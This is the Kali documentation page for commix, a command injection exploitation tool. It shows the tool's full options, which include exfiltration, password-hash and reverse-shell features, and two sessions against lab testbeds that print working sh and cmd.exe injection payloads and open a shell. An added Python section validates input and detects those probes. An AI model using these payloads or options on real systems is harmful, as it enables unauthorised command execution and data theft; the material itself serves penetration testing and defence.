Commix Introduction

Commix (short for [comm]and [i]njection e[x]ploiter) provides a simple environment that web developers, penetration testers and security researchers can use to test web applications for bugs, errors or vulnerabilities related to command injection attacks. With this tool it is easy to find and exploit a command injection vulnerability in a vulnerable parameter or string. Commix is written in Python.

Author: Anastasios Stasinopoulos
License: GPL v3

Tool source: Homepage
Kali commix Repo
Kali commix Package

commix - Automated All-in-One OS Command Injection and Exploitation Tool

root@kali:~# commix -h
Usage: python commix.py [option(s)]

Options:
  -h, --help  Show help and exit.

  General:
    These options relate to general matters.

    -v VERBOSE:  Verbosity level (0-4, Default: 0).
    --version:   Show version number and exit.
    --output-dir=OUT..   Set custom output directory path.
    -s SESSION_FILE:  Load session from a stored (.sqlite) file.
    --flush-session:  Flush session files for current target.
    --ignore-session:  Ignore results stored in session file.
    -t TRAFFIC_FILE:  Log all HTTP traffic into a textual file.
    --batch   Never ask for user input, use the default behaviour.

  Target:
    This options has to be provided, to define the target URL.

    -u URL, --url=URL:   Target URL.
    --url-reload:   Reload target URL after command execution.
    -l LOGFILE:   Parse target from HTTP proxy log file.
    -m BULKFILE:   Scan multiple targets given in a textual file.
    -r REQUESTFILE:   Load HTTP request from a file.
    --crawl=CRAWLDEPTH:  Crawl the website starting from the target URL (1-2,
                        Default: 0).
    -x SITEMAP_URL:  Parse target(s) from remote sitemap(.xml) file.

  Request:
    These options can be used to specify how to connect to the target URL.

    --data=DATA:  Data string to be sent through POST.
    --host=HOST:  HTTP Host header.
    --referer=REFERER:   HTTP Referer header.
    --user-agent=AGENT:  HTTP User-Agent header.
    --random-agent:    Use a randomly selected HTTP User-Agent header.
    --param-del=PDEL:    Set character for splitting parameter values.
    --cookie=COOKIE:     HTTP Cookie header.
    --cookie-del=CDEL:   Set character for splitting cookie values.
    --headers=HEADERS:   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
    --proxy=PROXY:     Use a HTTP proxy (e.g. '127.0.0.1:8080').
    --tor:         Use the Tor network.
    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).
    --auth-url=AUTH_..  Login panel URL.
    --auth-data=AUTH..  Login parameters and data.
    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').
    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').
    --ignore-401      Ignore HTTP error 401 (Unauthorized).
    --force-ssl       Force usage of SSL/HTTPS.

  Enumeration:
    These options can be used to enumerate the target host.

    --all            Retrieve everything.
    --current-user      Retrieve current user name.
    --hostname        Retrieve current hostname.
    --is-root         Check if the current user have root privileges.
    --is-admin        Check if the current user have admin privileges.
    --sys-info        Retrieve system information.
    --users          Retrieve system users.
    --passwords        Retrieve system users password hashes.
    --privileges       Retrieve system users privileges.
    --ps-version       Retrieve PowerShell's version number.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.
    --file-write=FIL..  Write to a file on the target host.
    --file-upload=FI..  Upload a file on the target host.
    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

  Modules:
    These options can be used increase the detection and/or injection
    capabilities.

    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.
                    (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
    --dns-server=DNS..  The 'DNS exfiltration' injection module.
                    (Domain name used for DNS exfiltration attack).
    --shellshock      The 'shellshock' injection module.

  Injection:
    These options can be used to specify which parameters to inject and to
    provide custom injection payloads.

    -p TEST_PARAMETER   Testable parameter(s).
    --suffix=SUFFIX     Injection payload suffix string.
    --prefix=PREFIX     Injection payload prefix string.
    --technique=TECH    Specify injection technique(s) to use.
    --maxlen=MAXLEN     Set the max length of output for time-related
                        injection techniques (Default: 10000 chars).
    --delay=DELAY       Set custom time delay for time-related injection
                        techniques (Default: 1 sec).
    --tmp-path=TMP_P..   Set the absolute path of web server's temp directory.
    --root-dir=SRV_R..   Set the absolute path of web server's root directory.
    --alter-shell=AL..   Use an alternative os-shell (e.g. 'Python').
    --os-cmd=OS_CMD     Execute a single operating system command.
    --os=OS          Force back-end operating system to this value.
    --tamper=TAMPER     Use given script(s) for tampering injection data.
    --msf-path=MSF_P..   Set a local path where metasploit is installed.

  Detection:
    These options can be used to customize the detection phase.

    --level=LEVEL       Level of tests to perform (1-3, Default: 1).
    --skip-calc        Skip the mathematic calculation during the detection
                        phase.
    --skip-empty       Skip testing the parameter(s) with empty value(s).

  Miscellaneous:
    --dependencies      Check for third-party (non-core) dependencies.
    --skip-waf        Skip heuristic detection of WAF/IPS/IDS protection.
    --offline         Work in offline mode.

root@kali:~#

Commix Usage Examples

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \
>   --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \
>   --data='ip=INJECT_HERE&Submit=Submit'
                          __          
   ___  ___   ___ ___   ___ ___ /\_\  __ _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/
v1.7-stable
(@commixproject)
{ v0.3b-nongit-20160104 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--
(*) Checking connection to the target URL... [ SUCCEED ]
(^) Warning: Heuristics have failed to identify server's operating system.
(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > w
(*) Setting the (POST) 'ip' parameter for tests.
(^) Warning: Due to the relatively slow response of 'cmd.exe' there may be delays during the data extraction procedure.
(*) Testing the classic injection technique... [ SUCCEED ]
(!) The (POST) 'ip' parameter is vulnerable to Results-based Command Injection.
  (+) Type : Results-based Command Injection
  (+) Technique : Classic Injection Technique
  (+) Payload : %26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA <nul

(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami

nt authority\iusr

commix(os_shell) >

Attempt to exploit a website (--url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php") using the highest test level (--level=3):

root@kali:~# commix --url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php" --level=3
                          __          
   ___  ___   ___ ___   ___ ___ /\_\  __ _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/
v1.7-stable
(@commixproject)
{ v0.3b-nongit-20160104 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst)
+--
[*] Checking connection to the target URL... [ SUCCEED ]
[*] Setting the HTTP header User-Agent for tests.
[*] Testing the (results-based) classic command injection technique... [ FAILED ]
[*] Testing the (results-based) dynamic code evaluation technique... [ FAILED ]
[*] Testing the (blind) time-based command injection technique... [ FAILED ]
[*] Trying to create a file in '/var/www/html/commix-testbed/scenarios/referer/'...
[!] Warning: It seems that you don't have permissions to read and/or write files in '/var/www/html/commix-testbed/scenarios/referer/'.
[?] Do you want to try the temporary directory (/tmp/) [Y/n] > Y
[*] Trying to create a file, in temporary directory (/tmp/)...
[*] Testing the (semi-blind) tempfile-based injection technique... [ FAILED ]
[!] Warning: The tested HTTP header User-Agent seems to be not injectable.
[*] Setting the HTTP header Referer for tests.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The HTTP header Referer seems injectable via (results-based) classic command injection technique.
    [~] Payload: ';echo KSXTLU$((18+64))$(echo KSXTLU)KSXTLU'

[?] Do you want a Pseudo-Terminal shell? [Y/n] > Y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > ?

  ---[ Available options ]---
  Type '?' to get all the available options.
  Type 'back' to move back from the current context.
  Type 'quit' (or use <Ctrl-C>) to quit commix.
  Type 'reverse_tcp' to get a reverse TCP connection.
  Type 'bind_tcp' to set a bind TCP connection.

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls

index.html referer(blind).php referer(classic).php referer(eval).php

commix(os_shell) > quit

root@kali:~#
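The two sessions above show the shape of a results-based probe: commix computes a small sum inside the injected command (`$((18+64))` for sh, `set /a (49+1)` for cmd.exe) and wraps the result in a random marker, so the expected number can be searched for in the response. The following is an added example from the defender's side, not code from commix or the page: a strict allowlist validator for the kind of "ping this host" parameter shown in the DVWA session, the hardened argv construction that never hands user input to a shell, and a log triage function that recognises the arithmetic probe pattern in request bodies. The sample POST bodies are constructed from the payload shapes shown above; `ping -c 1` is assumed to be the feature being protected.

```python
"""Defensive view of the command-injection pattern commix probes for.

Added example (not part of commix): an allowlist validator for a
user-supplied host, a shell-free argv builder for a ping feature, and a
request-body check for the results-based arithmetic probes shown in the
sessions above.
"""
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123 hostname: labels of letters, digits and hyphens, no leading or
# trailing hyphen, no shell metacharacters at all.  A leading '-' is rejected
# so the value can never be read as an option by the spawned program.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Results-based probes evaluate a small sum so the response can be searched
# for the result.  These match that shape for sh and for cmd.exe.
_PROBE_PATTERNS = [
    re.compile(r"\$\(\(\s*\d+\s*[-+*/]\s*\d+\s*\)\)"),             # $((18+64))
    re.compile(r"set\s+/a\s+\(?\s*\d+\s*[-+*/]\s*\d+", re.I),      # set /a (49+1)
]


def is_valid_target(value: str) -> bool:
    """Allowlist check: an IPv4/IPv6 literal or an RFC 1123 hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(value))


def build_ping_argv(value: str) -> list:
    """Hardened form of a DVWA-style ping feature (assumed: ping -c 1).

    Validate first, then return an argv list for subprocess.run(argv) with
    shell=False.  No shell ever sees the value, so ';', '&', '$(...)' and
    friends carry no meaning; invalid input is refused before that anyway.
    """
    if not is_valid_target(value):
        raise ValueError("target must be an IP address or hostname")
    return ["ping", "-c", "1", value]


def looks_like_probe(text: str) -> bool:
    """True if already URL-decoded text carries an arithmetic probe."""
    return any(p.search(text) for p in _PROBE_PATTERNS)


def triage(body: str) -> dict:
    """Classify one POST body (raw, URL-encoded) for log review.

    Reports whether the 'ip' value would pass the allowlist and whether any
    parameter value carries a results-based probe.
    """
    params = parse_qs(body, keep_blank_values=True)
    ip = params.get("ip", [""])[0]
    return {
        "ip": ip,
        "valid_target": is_valid_target(ip),
        "probe": any(looks_like_probe(v) for vals in params.values() for v in vals),
    }


# Constructed sample POST bodies: a benign request, then the sh and cmd.exe
# payload shapes from the sessions above, URL-encoded as a browser would.
SAMPLE_REQUESTS = [
    "ip=127.0.0.1&Submit=Submit",
    "ip=%27%3Becho+KSXTLU%24%28%2818%2B64%29%29%24%28echo+KSXTLU%29KSXTLU%27"
    "&Submit=Submit",
    "ip=%26+for+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22set+%2Fa+%2849%2B1%29"
    "%22%27%29+do+%40set+%2Fp+%3D+AWMZVA%25iAWMZVAAWMZVA+%3Cnul&Submit=Submit",
]


if __name__ == "__main__":
    for body in SAMPLE_REQUESTS:
        result = triage(body)
        flag = "PROBE" if result["probe"] else "ok"
        print(f"{flag:5} valid_target={result['valid_target']!s:5} ip={result['ip']!r}")
```

Run as a script it prints one triage line per sample body; the two probe bodies are flagged and fail the allowlist, while the benign one passes. The allowlist is the actual fix for the class of bug the tool finds: the detector only tells you that someone has been testing for it.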